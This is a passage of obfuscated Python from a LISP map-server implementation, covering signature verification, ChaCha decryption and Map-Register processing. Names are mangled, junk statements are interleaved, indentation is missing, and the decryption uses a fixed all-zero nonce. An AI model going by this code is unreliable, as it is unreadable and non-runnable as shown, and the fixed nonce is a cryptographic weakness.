if 99 - 99: i11iIiiIii / oO0o . i11iIiiIii
if 46 - 46: I1ii11iIi11i
II1I1IIi1111I = O0OO0OoO00oOo [ "signature" ]
if 3 - 3: iII111i / i11iIiiIii % OOooOOo + Ii1I . Oo0Ooo
try :
O0OO0OoO00oOo = binascii . a2b_base64 ( II1I1IIi1111I )
except :
lprint ( " Incorrect padding in signature string" )
return ( False )
if 16 - 16: oO0o / Ii1I % i11iIiiIii % I1IiiI * I1ii11iIi11i
if 4 - 4: iIii1I11I1II1 + Ii1I % I1Ii111 . OoOoOO00 % OoooooooOO + II111iiii
i111Ii = len ( O0OO0OoO00oOo )
if ( i111Ii & 1 ) :
lprint ( " Signature length is odd, length {}" . format ( i111Ii ) )
return ( False )
if 14 - 14: oO0o . OOooOOo * OOooOOo . OoO0O00
if 27 - 27: OOooOOo - iII111i - IiII
if 14 - 14: i11iIiiIii . I1ii11iIi11i % OoOoOO00 * Ii1I / OoO0O00
if 56 - 56: o0oOOo0O0Ooo / I1IiiI + I11i + I1IiiI
if 34 - 34: Oo0Ooo / i11iIiiIii - ooOoO0o
IIIiiI1I = Oo0o0ooOo0 . print_address ( )
if 77 - 77: OoOoOO00 * OoooooooOO
if 41 - 41: iIii1I11I1II1 - O0 . II111iiii + I1IiiI - II111iiii / oO0o
if 35 - 35: ooOoO0o - OoOoOO00 / iIii1I11I1II1 / OOooOOo
if 38 - 38: i1IIi % OoooooooOO
I1i1ii = binascii . a2b_base64 ( I1i1ii )
try :
Oo000O000 = ecdsa . VerifyingKey . from_pem ( I1i1ii )
except :
IiiiIi = bold ( "Bad public-key" , False )
lprint ( " {}, not in PEM format" . format ( IiiiIi ) )
return ( False )
if 54 - 54: OOooOOo * I1ii11iIi11i + OoooooooOO
if 58 - 58: i1IIi - OoooooooOO * OOooOOo . ooOoO0o + O0 + o0oOOo0O0Ooo
if 87 - 87: OOooOOo + I1Ii111 + O0 / oO0o / i11iIiiIii
if 60 - 60: O0 . II111iiii
if 69 - 69: II111iiii / ooOoO0o - OoOoOO00 / OOooOOo
if 52 - 52: OoO0O00 % I11i + o0oOOo0O0Ooo % OoOoOO00
if 46 - 46: o0oOOo0O0Ooo % O0
if 30 - 30: oO0o
if 64 - 64: O0
if 70 - 70: oO0o % I1IiiI . iIii1I11I1II1 - Oo0Ooo + OoOoOO00 % O0
if 91 - 91: I1Ii111 - oO0o * ooOoO0o - I1ii11iIi11i + IiII + O0
try :
OO = Oo000O000 . verify ( O0OO0OoO00oOo , IIIiiI1I , hashfunc = hashlib . sha256 )
except :
lprint ( " Signature library failed for signature data '{}'" . format ( IIIiiI1I ) )
if 18 - 18: OoOoOO00 / IiII / o0oOOo0O0Ooo . OOooOOo
lprint ( " Signature used '{}'" . format ( II1I1IIi1111I ) )
return ( False )
if 35 - 35: I11i . ooOoO0o % I11i / iII111i / O0 % I11i
return ( OO )
if 29 - 29: I1Ii111 + Ii1I
if 100 - 100: Ii1I + I1Ii111 / iIii1I11I1II1 / i1IIi % OoOoOO00
if 6 - 6: oO0o + ooOoO0o
if 13 - 13: Oo0Ooo . IiII % iII111i + i1IIi / OOooOOo
if 1 - 1: I11i * i1IIi * Oo0Ooo % O0
if 41 - 41: OOooOOo % OoOoOO00
if 82 - 82: I11i . IiII
if 27 - 27: I1Ii111 % O0 * OoooooooOO . Oo0Ooo
if 51 - 51: I11i
if 80 - 80: Oo0Ooo + oO0o
def lisp_remove_eid_from_map_notify_queue ( eid_list ) :
if 76 - 76: I1IiiI * OoooooooOO - i11iIiiIii / I11i / Oo0Ooo
if 82 - 82: IiII % ooOoO0o
if 100 - 100: Oo0Ooo . oO0o - iII111i + OoooooooOO
if 27 - 27: Oo0Ooo . I1Ii111 - i1IIi * I1IiiI
if 96 - 96: I1ii11iIi11i - Ii1I . I1ii11iIi11i
Oo0Oo00O000 = [ ]
for o0oOo0oo0 in eid_list :
for iiI1IiII1iI in lisp_map_notify_queue :
Ii1ii1 = lisp_map_notify_queue [ iiI1IiII1iI ]
if ( o0oOo0oo0 not in Ii1ii1 . eid_list ) : continue
if 54 - 54: IiII - I11i % OoooooooOO
Oo0Oo00O000 . append ( iiI1IiII1iI )
iiI1IOO00o0Oo0000 = Ii1ii1 . retransmit_timer
if ( iiI1IOO00o0Oo0000 ) : iiI1IOO00o0Oo0000 . cancel ( )
if 15 - 15: iII111i
lprint ( "Remove from Map-Notify queue nonce 0x{} for EID {}" . format ( Ii1ii1 . nonce_key , green ( o0oOo0oo0 , False ) ) )
if 55 - 55: iII111i
if 22 - 22: I1Ii111 % II111iiii % iIii1I11I1II1 % II111iiii
if 33 - 33: II111iiii
if 60 - 60: iIii1I11I1II1 / OOooOOo
if 78 - 78: i11iIiiIii
if 20 - 20: OoooooooOO * OoooooooOO - OOooOOo
if 34 - 34: I1ii11iIi11i * i1IIi % OoooooooOO / I1IiiI
for iiI1IiII1iI in Oo0Oo00O000 : lisp_map_notify_queue . pop ( iiI1IiII1iI )
return
if 39 - 39: OoO0O00 + IiII - II111iiii % I11i
if 80 - 80: o0oOOo0O0Ooo * ooOoO0o
if 87 - 87: I1Ii111 + O0 / I1ii11iIi11i / OoOoOO00 . Oo0Ooo - IiII
if 24 - 24: OoOoOO00
if 19 - 19: ooOoO0o
if 43 - 43: O0 . I1Ii111 % OoooooooOO / I1IiiI . o0oOOo0O0Ooo - OoOoOO00
if 46 - 46: I11i - OoooooooOO % o0oOOo0O0Ooo
if 7 - 7: OoooooooOO - I1Ii111 * IiII
def lisp_decrypt_map_register ( packet ) :
if 20 - 20: o0oOOo0O0Ooo . OoooooooOO * I1IiiI . Oo0Ooo * OoOoOO00
if 3 - 3: I1Ii111 % i11iIiiIii % O0 % II111iiii
if 8 - 8: OoooooooOO * ooOoO0o
if 26 - 26: i11iIiiIii + oO0o - i1IIi
if 71 - 71: I1IiiI % I1Ii111 / oO0o % oO0o / iIii1I11I1II1 + I1Ii111
O0ooOoO0 = socket . ntohl ( struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ] )
O00oOO0OO00 = ( O0ooOoO0 >> 13 ) & 0x1
if ( O00oOO0OO00 == 0 ) : return ( packet )
if 61 - 61: I1ii11iIi11i % I1IiiI % OoOoOO00
oo0Oo00oOO = ( O0ooOoO0 >> 14 ) & 0x7
if 88 - 88: OoO0O00
if 82 - 82: OOooOOo / I11i / OoooooooOO % oO0o
if 27 - 27: oO0o + IiII
if 5 - 5: iIii1I11I1II1 + OoOoOO00 * I1Ii111 * i11iIiiIii
try :
II11iI11i1 = lisp_ms_encryption_keys [ oo0Oo00oOO ]
II11iI11i1 = II11iI11i1 . zfill ( 32 )
iiI1iiIiiiI1I = "0" * 8
except :
lprint ( "Cannot decrypt Map-Register with key-id {}" . format ( oo0Oo00oOO ) )
return ( None )
if 37 - 37: I1IiiI / OoO0O00 . OoO0O00 + i11iIiiIii - oO0o
if 57 - 57: I1IiiI . OoO0O00
OooOOOoOoo0O0 = bold ( "Decrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( OooOOOoOoo0O0 , oo0Oo00oOO ) )
if 49 - 49: II111iiii + iII111i
iiii1Ii1iii = chacha . ChaCha ( II11iI11i1 , iiI1iiIiiiI1I ) . decrypt ( packet [ 4 : : ] )
return ( packet [ 0 : 4 ] + iiii1Ii1iii )
if 85 - 85: I11i / i11iIiiIii
if 33 - 33: iIii1I11I1II1 % O0 + II111iiii * OOooOOo . Ii1I * iII111i
if 48 - 48: I11i * iIii1I11I1II1 / oO0o
if 34 - 34: i1IIi + oO0o * Oo0Ooo * I1Ii111 % OoooooooOO % ooOoO0o
if 17 - 17: I1ii11iIi11i + o0oOOo0O0Ooo / OoO0O00 . Oo0Ooo - o0oOOo0O0Ooo / oO0o
if 87 - 87: ooOoO0o
if 74 - 74: i11iIiiIii . i11iIiiIii . iIii1I11I1II1
def lisp_process_map_register ( lisp_sockets , packet , source , sport ) :
global lisp_registered_count
if 100 - 100: i11iIiiIii - oO0o + iIii1I11I1II1 * OoOoOO00 % OOooOOo % i11iIiiIii
if 26 - 26: O0
if 97 - 97: OOooOOo + I11i % I1Ii111 % i11iIiiIii / I1ii11iIi11i
if 21 - 21: O0 + iIii1I11I1II1 / i11iIiiIii . OOooOOo * i1IIi
if 3 - 3: i1IIi % o0oOOo0O0Ooo + OoOoOO00
if 32 - 32: OoO0O00 . Oo0Ooo * iIii1I11I1II1
packet = lisp_decrypt_map_register ( packet )
if ( packet == None ) : return
if 12 - 12: O0 + I1ii11iIi11i + I11i . I1Ii111
I1ooo0o00o0Oooo = lisp_map_register ( )
OoO , packet = I1ooo0o00o0Oooo . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Register packet" )
return
if 86 - 86: II111iiii . OoOoOO00 % I1IiiI * OOooOOo . OoOoOO00 + O0
I1ooo0o00o0Oooo . sport = sport
if 15 - 15: i11iIiiIii / I1IiiI - iII111i
I1ooo0o00o0Oooo . print_map_register ( )
if 75 - 75: o0oOOo0O0Ooo . I11i
if 4 - 4: iIii1I11I1II1 % i1IIi % i11iIiiIii / OOooOOo
if 93 - 93: I1ii11iIi11i - iII111i % O0 - Ii1I
if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 % IiII * I11i + ooOoO0o
OOOO00OO0O0o = True
if ( I1ooo0o00o0Oooo . auth_len == LISP_SHA1_160_AUTH_DATA_LEN ) :
OOOO00OO0O0o = True
if 20 - 20: iIii1I11I1II1 % oO0o + o0oOOo0O0Ooo + oO0o % IiII
if ( I1ooo0o00o0Oooo . alg_id == LISP_SHA_256_128_ALG_ID ) :
OOOO00OO0O0o = False
if 84 - 84: IiII - O0 . I1ii11iIi11i % OOooOOo % iII111i + OoooooooOO
if 74 - 74: o0oOOo0O0Ooo + OoOoOO00 - o0oOOo0O0Ooo
if 2 - 2: OOooOOo
if 14 - 14: Ii1I - O0 - IiII % Ii1I / OoOoOO00 * OoooooooOO
if 57 - 57: Oo0Ooo % Oo0Ooo % O0 . I1Ii111 % I1ii11iIi11i
OO0O0O00Oo = [ ]
if 9 - 9: i11iIiiIii - i11iIiiIii / OOooOOo - ooOoO0o % OoOoOO00 + Ii1I
if 3 - 3: iII111i / I1ii11iIi11i / I1IiiI - Oo0Ooo
if 71 - 71: i11iIiiIii + Oo0Ooo % i11iIiiIii - i11iIiiIii
if 84 - 84: oO0o
ooo000O0O = None
iI111iIII1I = packet
OOooOo0o0oOoo = [ ]
ooOO0o0O0 = I1ooo0o00o0Oooo . record_count
for IiIIi1IiiIiI in range ( ooOO0o0O0 ) :
i111iII = lisp_eid_record ( )
I1Ii11iI = lisp_rloc_record ( )
packet = i111iII . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Register packet" )
return
if 14 - 14: II111iiii + OOooOOo * Ii1I * I1IiiI + OOooOOo . OOooOOo
i111iII . print_record ( " " , False )
if 5 - 5: oO0o + OoooooooOO
if 88 - 88: oO0o + OOooOOo
if 14 - 14: I11i / i1IIi
if 56 - 56: OoooooooOO
o0o000 = lisp_site_eid_lookup ( i111iII . eid , i111iII . group ,
False )
if 59 - 59: I1ii11iIi11i + OoO0O00
i11iiii11iIii = o0o000 . print_eid_tuple ( ) if o0o000 else None
if 11 - 11: o0oOOo0O0Ooo
if 77 - 77: o0oOOo0O0Ooo / iIii1I11I1II1 * iIii1I11I1II1 / o0oOOo0O0Ooo * iII111i
if 26 - 26: Ii1I
if 1 - 1: OoOoOO00 . o0oOOo0O0Ooo + Oo0Ooo % Oo0Ooo * I1ii11iIi11i
if 50 - 50: IiII / i1IIi . I1ii11iIi11i
if 75 - 75: I11i * oO0o + OoooooooOO . iII111i + OoO0O00
if 44 - 44: II111iiii
if ( o0o000 and o0o000 . accept_more_specifics == False ) :
if ( o0o000 . eid_record_matches ( i111iII ) == False ) :
O0Ii1IiiiI = o0o000 . parent_for_more_specifics
if ( O0Ii1IiiiI ) : o0o000 = O0Ii1IiiiI
if 32 - 32: I1Ii111 % oO0o * iII111i * OOooOOo
if 45 - 45: oO0o / O0
if 5 - 5: OoO0O00 / O0
if 64 - 64: I11i / i1IIi
if 68 - 68: Ii1I / oO0o - iII111i
if 52 - 52: I11i / OoO0O00 - Ii1I
if 11 - 11: OoooooooOO - i11iIiiIii - I1ii11iIi11i / o0oOOo0O0Ooo - Ii1I
if 16 - 16: ooOoO0o + O0
Ii1I111IiI11I = ( o0o000 and o0o000 . accept_more_specifics )
if ( Ii1I111IiI11I ) :
Oo0oOO = lisp_site_eid ( o0o000 . site )
Oo0oOO . dynamic = True
Oo0oOO . eid . copy_address ( i111iII . eid )
Oo0oOO . group . copy_address ( i111iII . group )
Oo0oOO . parent_for_more_specifics = o0o000
Oo0oOO . add_cache ( )
Oo0oOO . inherit_from_ams_parent ( )
o0o000 . more_specific_registrations . append ( Oo0oOO )
o0o000 = Oo0oOO
else :
o0o000 = lisp_site_eid_lookup ( i111iII . eid , i111iII . group ,
True )
if 33 - 33: oO0o * II111iiii / OOooOOo + I1ii11iIi11i * OoooooooOO
if 89 - 89: ooOoO0o / ooOoO0o
I11i11i1 = i111iII . print_eid_tuple ( )
if 61 - 61: iIii1I11I1II1
if ( o0o000 == None ) :
iiiII = bold ( "Site not found" , False )
lprint ( " {} for EID {}{}" . format ( iiiII , green ( I11i11i1 , False ) ,
", matched non-ams {}" . format ( green ( i11iiii11iIii , False ) if i11iiii11iIii else "" ) ) )
if 26 - 26: i11iIiiIii + OoO0O00 - i1IIi / OOooOOo
if 71 - 71: OOooOOo . i1IIi
if 48 - 48: ooOoO0o - Ii1I - I11i
if 70 - 70: O0 * I11i . i1IIi - ooOoO0o
if 93 - 93: OoooooooOO / o0oOOo0O0Ooo
packet = I1Ii11iI . end_of_rlocs ( packet , i111iII . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 61 - 61: II111iiii / i1IIi . I1ii11iIi11i % iIii1I11I1II1
continue
if 66 - 66: iIii1I11I1II1 % OoOoOO00 + i1IIi * i11iIiiIii * OoooooooOO
if 36 - 36: iII111i - OoO0O00 + I1IiiI + Ii1I . OoooooooOO
ooo000O0O = o0o000 . site
if 75 - 75: oO0o * Oo0Ooo * O0
if ( Ii1I111IiI11I ) :
oOo = o0o000 . parent_for_more_specifics . print_eid_tuple ( )
lprint ( " Found ams {} for site '{}' for registering prefix {}" . format ( green ( oOo , False ) , ooo000O0O . site_name , green ( I11i11i1 , False ) ) )
if 22 - 22: ooOoO0o / OoooooooOO . II111iiii / Ii1I * OoO0O00 . i1IIi
else :
oOo = green ( o0o000 . print_eid_tuple ( ) , False )
lprint ( " Found {} for site '{}' for registering prefix {}" . format ( oOo , ooo000O0O . site_name , green ( I11i11i1 , False ) ) )
if 62 - 62: oO0o % Ii1I - Ii1I
if 16 - 16: OoO0O00 - O0 - OOooOOo - I11i % OoOoOO00
if 7 - 7: I1Ii111 / OoOoOO00 . II111iiii
if 9 - 9: I11i . I11i . OoooooooOO
if 42 - 42: iII111i / oO0o / iII111i * OoO0O00
if 25 - 25: OoOoOO00 - II111iiii + II111iiii . Ii1I * II111iiii
if ( ooo000O0O . shutdown ) :
lprint ( ( " Rejecting registration for site '{}', configured in " +
"admin-shutdown state" ) . format ( ooo000O0O . site_name ) )
packet = I1Ii11iI . end_of_rlocs ( packet , i111iII . rloc_count )
continue
if 12 - 12: IiII / Ii1I
if 54 - 54: Oo0Ooo + Ii1I % OoooooooOO * OOooOOo / OoOoOO00
if 39 - 39: I1IiiI % i11iIiiIii % Ii1I
if 59 - 59: ooOoO0o % OoO0O00 / I1IiiI - II111iiii + OoooooooOO * i11iIiiIii
if 58 - 58: IiII / Oo0Ooo + o0oOOo0O0Ooo
if 71 - 71: Ii1I - IiII
if 2 - 2: OoOoOO00 % IiII % OoO0O00 . i1IIi / I1Ii111 - iIii1I11I1II1
if 88 - 88: Oo0Ooo * i1IIi % OOooOOo
I1I1I1 = I1ooo0o00o0Oooo . key_id
if ( ooo000O0O . auth_key . has_key ( I1I1I1 ) ) :
o0Oooo00oO0o00 = ooo000O0O . auth_key [ I1I1I1 ]
else :
o0Oooo00oO0o00 = ""
if 31 - 31: I11i - oO0o * ooOoO0o
if 64 - 64: I11i
I1iiIIiIII1i = lisp_verify_auth ( OoO , I1ooo0o00o0Oooo . alg_id ,
I1ooo0o00o0Oooo . auth_data , o0Oooo00oO0o00 )
oo0o00oOOooO = "dynamic " if o0o000 . dynamic else ""
if 22 - 22: OOooOOo
O0o = bold ( "passed" if I1iiIIiIII1i else "failed" , False )
I1I1I1 = "key-id {}" . format ( I1I1I1 ) if I1I1I1 == I1ooo0o00o0Oooo . key_id else "bad key-id {}" . format ( I1ooo0o00o0Oooo . key_id )
if 12 - 12: I11i * I1IiiI + OOooOOo
lprint ( " Authentication {} for {}EID-prefix {}, {}" . format ( O0o , oo0o00oOOooO , green ( I11i11i1 , False ) , I1I1I1 ) )
if 40 - 40: I1ii11iIi11i - OoOoOO00 % OoooooooOO * o0oOOo0O0Ooo % OoooooooOO
if 47 - 47: iIii1I11I1II1 - OOooOOo + I1ii11iIi11i * ooOoO0o + Oo0Ooo + OoO0O00
if 64 - 64: OoOoOO00 - OoOoOO00 . OoooooooOO + ooOoO0o
if 100 - 100: ooOoO0o . OoooooooOO % i1IIi % OoO0O00
if 26 - 26: OoOoOO00 * IiII
if 76 - 76: I1IiiI + IiII * I1ii11iIi11i * I1IiiI % Ii1I + ooOoO0o
iI1I1ii = True
OooOo = ( lisp_get_eid_hash ( i111iII . eid ) != None )
if ( OooOo or o0o000 . require_signature ) :
I1i111i1ii11 = "Required " if o0o000 . require_signature else ""
I11i11i1 = green ( I11i11i1 , False )
I1IIiIIIii = lisp_find_sig_in_rloc_set ( packet , i111iII . rloc_count )
if ( I1IIiIIIii == None ) :
iI1I1ii = False
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}, no signature found" ) . format ( I1i111i1ii11 ,
# I1ii11iIi11i % I1ii11iIi11i / oO0o
bold ( "failed" , False ) , I11i11i1 ) )
else :
iI1I1ii = lisp_verify_cga_sig ( i111iII . eid , I1IIiIIIii )
O0o = bold ( "passed" if iI1I1ii else "failed" , False )
lprint ( ( " {}EID-crypto-hash signature verification {} " + "for EID-prefix {}" ) . format ( I1i111i1ii11 , O0o , I11i11i1 ) )
if 85 - 85: OoOoOO00 % I11i / Oo0Ooo + I11i - Oo0Ooo
if 20 - 20: IiII
if 81 - 81: Oo0Ooo / I1Ii111
if 20 - 20: o0oOOo0O0Ooo + ooOoO0o % i1IIi
if ( I1iiIIiIII1i == False or iI1I1ii == False ) :
packet = I1Ii11iI . end_of_rlocs ( packet , i111iII . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 51 - 51: iII111i - ooOoO0o
continue
if 32 - 32: IiII - i11iIiiIii
if 41 - 41: Ii1I % Ii1I * oO0o - I11i + iIii1I11I1II1 . ooOoO0o
if 30 - 30: Ii1I * iII111i . II111iiii / i1IIi
if 77 - 77: oO0o . IiII + I1ii11iIi11i . i1IIi
if 49 - 49: I1Ii111 . OoooooooOO / o0oOOo0O0Ooo - iII111i - iII111i - i11iIiiIii
if 37 - 37: OOooOOo
if ( I1ooo0o00o0Oooo . merge_register_requested ) :
O0Ii1IiiiI = o0o000
O0Ii1IiiiI . inconsistent_registration = False
if 79 - 79: I1Ii111 - OoO0O00 + ooOoO0o + oO0o . i11iIiiIii + i1IIi
if 32 - 32: IiII . ooOoO0o / OoO0O00 / iII111i . iIii1I11I1II1 % IiII
if 28 - 28: I1Ii111 + OoooooooOO + IiII . ooOoO0o . I1IiiI / oO0o
if 66 - 66: Ii1I - I11i + Oo0Ooo . ooOoO0o
if 89 - 89: IiII . II111iiii / OoO0O00 + I1ii11iIi11i * i11iIiiIii
if ( o0o000 . group . is_null ( ) ) :
if ( O0Ii1IiiiI . site_id != I1ooo0o00o0Oooo . site_id ) :
O0Ii1IiiiI . site_id = I1ooo0o00o0Oooo . site_id
O0Ii1IiiiI . registered = False
O0Ii1IiiiI . individual_registrations = { }
O0Ii1IiiiI . registered_rlocs = [ ]
lisp_registered_count -= 1
if 85 - 85: o0oOOo0O0Ooo - Oo0Ooo / I1Ii111
if 100 - 100: OoO0O00 * iIii1I11I1II1 - IiII . i1IIi % i11iIiiIii % Oo0Ooo
if 22 - 22: ooOoO0o - OOooOOo
Oo000O000 = source . address + I1ooo0o00o0Oooo . xtr_id
if ( o0o000 . individual_registrations . has_key ( Oo000O000 ) ) :
o0o000 = o0o000 . individual_registrations [ Oo000O000 ]
else :
o0o000 = lisp_site_eid ( ooo000O0O )
o0o000 . eid . copy_address ( O0Ii1IiiiI . eid )
o0o000 . group . copy_address ( O0Ii1IiiiI . group )
o0o000 . encrypt_json = O0Ii1IiiiI . encrypt_json
O0Ii1IiiiI . individual_registrations [ Oo000O000 ] = o0o000
if 90 - 90: i11iIiiIii . i11iIiiIii - iIii1I11I1II1
else :
o0o000 . inconsistent_registration = o0o000 . merge_register_requested
if 20 - 20: ooOoO0o - i11iIiiIii
if 23 - 23: OoO0O00 + I1IiiI / I1ii11iIi11i * I1ii11iIi11i % ooOoO0o
if 83 - 83: I1IiiI * i11iIiiIii - I1ii11iIi11i + I11i
o0o000 . map_registers_received += 1
if 33 - 33: OoO0O00 . OoooooooOO % iII111i / oO0o * Ii1I + ooOoO0o
if 29 - 29: oO0o
if 21 - 21: i11iIiiIii . o0oOOo0O0Ooo
if 78 - 78: Oo0Ooo
if 77 - 77: oO0o % Oo0Ooo % O0
IiiiIi = ( o0o000 . is_rloc_in_rloc_set ( source ) == False )
if ( i111iII . record_ttl == 0 and IiiiIi ) :
lprint ( " Ignore deregistration request from {}" . format ( red ( source . print_address_no_iid ( ) , False ) ) )
if 51 - 51: IiII % IiII + OOooOOo . II111iiii / I1ii11iIi11i
continue
if 4 - 4: o0oOOo0O0Ooo % I1IiiI * o0oOOo0O0Ooo * OoOoOO00 - Ii1I
if 61 - 61: OoooooooOO - OoOoOO00 . O0 / ooOoO0o . Ii1I
if 41 - 41: Oo0Ooo / OoOoOO00 % I1Ii111 - O0
if 19 - 19: I1IiiI % I1Ii111 - O0 . iIii1I11I1II1 . I11i % O0
if 88 - 88: ooOoO0o
if 52 - 52: iIii1I11I1II1 % ooOoO0o * iIii1I11I1II1
ii1iii11IiIii = o0o000 . registered_rlocs
o0o000 . registered_rlocs = [ ]
if 94 - 94: OOooOOo % I1ii11iIi11i % O0 + iII111i
if 62 - 62: iIii1I11I1II1 . OoOoOO00 / iIii1I11I1II1 + IiII
if 31 - 31: Ii1I . OoO0O00 . Ii1I + OoO0O00 * iIii1I11I1II1 . iII111i
if 42 - 42: O0 / oO0o % O0 . i1IIi % OOooOOo
iII1I1iII1i = packet
for OO00O0O in range ( i111iII . rloc_count ) :
I1Ii11iI = lisp_rloc_record ( )
packet = I1Ii11iI . decode ( packet , None , o0o000 . encrypt_json )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 51 - 51: i1IIi
I1Ii11iI . print_record ( " " )
if 29 - 29: o0oOOo0O0Ooo / II111iiii % O0 - o0oOOo0O0Ooo * I11i * Ii1I
if 2 - 2: oO0o + I11i * o0oOOo0O0Ooo / o0oOOo0O0Ooo . Oo0Ooo
if 34 - 34: i11iIiiIii / OoooooooOO - II111iiii
if 93 - 93: Oo0Ooo % ooOoO0o . OoOoOO00 + o0oOOo0O0Ooo * IiII * Oo0Ooo
if ( len ( ooo000O0O . allowed_rlocs ) > 0 ) :
oo0o00OO = I1Ii11iI . rloc . print_address ( )
if ( ooo000O0O . allowed_rlocs . has_key ( oo0o00OO ) == False ) :
lprint ( ( " Reject registration, RLOC {} not " + "configured in allowed RLOC-set" ) . format ( red ( oo0o00OO , False ) ) )
if 34 - 34: I11i - OoooooooOO % i1IIi + I1IiiI
if 14 - 14: I1IiiI . o0oOOo0O0Ooo / I1Ii111
o0o000 . registered = False
packet = I1Ii11iI . end_of_rlocs ( packet ,
i111iII . rloc_count - OO00O0O - 1 )
break
if 67 - 67: OoooooooOO . oO0o * OoOoOO00 - OoooooooOO
if 32 - 32: oO0o
if 72 - 72: I1IiiI
if 34 - 34: ooOoO0o % II111iiii / ooOoO0o
if 87 - 87: Oo0Ooo
if 7 - 7: iIii1I11I1II1
I1IIiIIIii = lisp_rloc ( )
I1IIiIIIii . store_rloc_from_record ( I1Ii11iI , None , source )
if 85 - 85: iIii1I11I1II1 . O0
if 43 - 43: II111iiii / OoOoOO00 + OOooOOo % Oo0Ooo * OOooOOo
if 62 - 62: ooOoO0o * OOooOOo . I11i + Oo0Ooo - I1Ii111
if 48 - 48: I1Ii111 * Oo0Ooo % OoO0O00 % Ii1I
if 8 - 8: OoO0O00 . OoO0O00
if 29 - 29: I11i + OoooooooOO % o0oOOo0O0Ooo - I1Ii111
if ( source . is_exact_match ( I1IIiIIIii . rloc ) ) :
I1IIiIIIii . map_notify_requested = I1ooo0o00o0Oooo . map_notify_requested
if 45 - 45: II111iiii - OOooOOo / oO0o % O0 . iII111i . iII111i
if 82 - 82: iIii1I11I1II1 % Oo0Ooo * i1IIi - I1Ii111 - I1ii11iIi11i / iII111i
if 24 - 24: IiII
if 95 - 95: IiII + OoOoOO00 * OOooOOo
if 92 - 92: OoOoOO00 + ooOoO0o . iII111i
o0o000 . registered_rlocs . append ( I1IIiIIIii )
if 59 - 59: iIii1I11I1II1 % I1Ii111 + I1ii11iIi11i . OoOoOO00 * Oo0Ooo / I1Ii111
if 41 - 41: i1IIi / IiII
oO0000O0OOO = ( o0o000 . do_rloc_sets_match ( ii1iii11IiIii ) == False )
if 3 - 3: OOooOOo + O0 - iII111i * oO0o - II111iiii
if 7 - 7: Ii1I % OoooooooOO - i1IIi / i1IIi - Oo0Ooo
if 96 - 96: Oo0Ooo - ooOoO0o
if 46 - 46: o0oOOo0O0Ooo
if 41 - 41: I11i % II111iiii - II111iiii + OoO0O00
if 98 - 98: iIii1I11I1II1 + OOooOOo * oO0o / o0oOOo0O0Ooo . iII111i
if ( I1ooo0o00o0Oooo . map_register_refresh and oO0000O0OOO and
o0o000 . registered ) :
lprint ( " Reject registration, refreshes cannot change RLOC-set" )
o0o000 . registered_rlocs = ii1iii11IiIii
continue
if 52 - 52: IiII + iIii1I11I1II1
if 22 - 22: IiII - OOooOOo + I1ii11iIi11i
if 64 - 64: OoOoOO00
if 79 - 79: IiII
if 65 - 65: Oo0Ooo - i11iIiiIii * OoOoOO00 . I1Ii111 . iIii1I11I1II1
if 48 - 48: iIii1I11I1II1 - oO0o / OoO0O00 + O0 . Ii1I + I1Ii111
if ( o0o000 . registered == False ) :
o0o000 . first_registered = lisp_get_timestamp ( )
lisp_registered_count += 1
if 17 - 17: OoOoOO00 . Oo0Ooo - I1Ii111 / I1Ii111 + I11i % i1IIi
o0o000 . last_registered = lisp_get_timestamp ( )
o0o000 . registered = ( i111iII . record_ttl != 0 )
o0o000 . last_registerer = source
if 31 - 31: OoooooooOO . O0 / OoO0O00 . I1Ii111
if 41 - 41: OoooooooOO + iII111i . OOooOOo
if 73 - 73: oO0o + i1IIi + i11iIiiIii / I1ii11iIi11i
if 100 - 100: I1IiiI % ooOoO0o % OoooooooOO / i11iIiiIii + i11iIiiIii % IiII
o0o000 . auth_sha1_or_sha2 = OOOO00OO0O0o
o0o000 . proxy_reply_requested = I1ooo0o00o0Oooo . proxy_reply_requested
o0o000 . lisp_sec_present = I1ooo0o00o0Oooo . lisp_sec_present
o0o000 . map_notify_requested = I1ooo0o00o0Oooo . map_notify_requested
o0o000 . mobile_node_requested = I1ooo0o00o0Oooo . mobile_node
o0o000 . merge_register_requested = I1ooo0o00o0Oooo . merge_register_requested
if 39 - 39: Ii1I % o0oOOo0O0Ooo + OOooOOo / iIii1I11I1II1
o0o000 . use_register_ttl_requested = I1ooo0o00o0Oooo . use_ttl_for_timeout
if ( o0o000 . use_register_ttl_requested ) :
o0o000 . register_ttl = i111iII . store_ttl ( )
else :
o0o000 . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
if 40 - 40: iIii1I11I1II1 / iII111i % OOooOOo % i11iIiiIii
o0o000 . xtr_id_present = I1ooo0o00o0Oooo . xtr_id_present
if ( o0o000 . xtr_id_present ) :
o0o000 . xtr_id = I1ooo0o00o0Oooo . xtr_id
o0o000 . site_id = I1ooo0o00o0Oooo . site_id
if 57 - 57: II111iiii % OoO0O00 * i1IIi
if 19 - 19: ooOoO0o . iIii1I11I1II1 + I1ii11iIi11i + I1ii11iIi11i / o0oOOo0O0Ooo . Oo0Ooo
if 9 - 9: II111iiii % OoooooooOO
if 4 - 4: i1IIi * i11iIiiIii % OoooooooOO + OoOoOO00 . oO0o
if 95 - 95: I1ii11iIi11i * OoOoOO00 % o0oOOo0O0Ooo / O0 + ooOoO0o % OOooOOo
if ( I1ooo0o00o0Oooo . merge_register_requested ) :
if ( O0Ii1IiiiI . merge_in_site_eid ( o0o000 ) ) :
OO0O0O00Oo . append ( [ i111iII . eid , i111iII . group ] )
if 48 - 48: i1IIi + IiII - iIii1I11I1II1 . i11iIiiIii % OOooOOo + I1ii11iIi11i
if ( I1ooo0o00o0Oooo . map_notify_requested ) :
lisp_send_merged_map_notify ( lisp_sockets , O0Ii1IiiiI , I1ooo0o00o0Oooo ,
i111iII )
if 95 - 95: ooOoO0o + OoOoOO00 . II111iiii + Ii1I
if 81 - 81: OoooooooOO / OOooOOo / Oo0Ooo
if 26 - 26: iII111i
if ( oO0000O0OOO == False ) : continue
if ( len ( OO0O0O00Oo ) != 0 ) : continue
if 93 - 93: Oo0Ooo + I1IiiI % OoOoOO00 / OOooOOo / I1ii11iIi11i
